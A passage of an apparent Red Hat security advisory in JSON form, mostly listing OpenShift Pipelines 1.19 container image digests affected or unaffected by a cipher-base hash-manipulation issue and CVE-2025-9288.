"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cipher-base: Cipher-base hash manipulation"
},
{
"cve": "CVE-2025-9288",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2025-08-20T23:00:56.263191+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
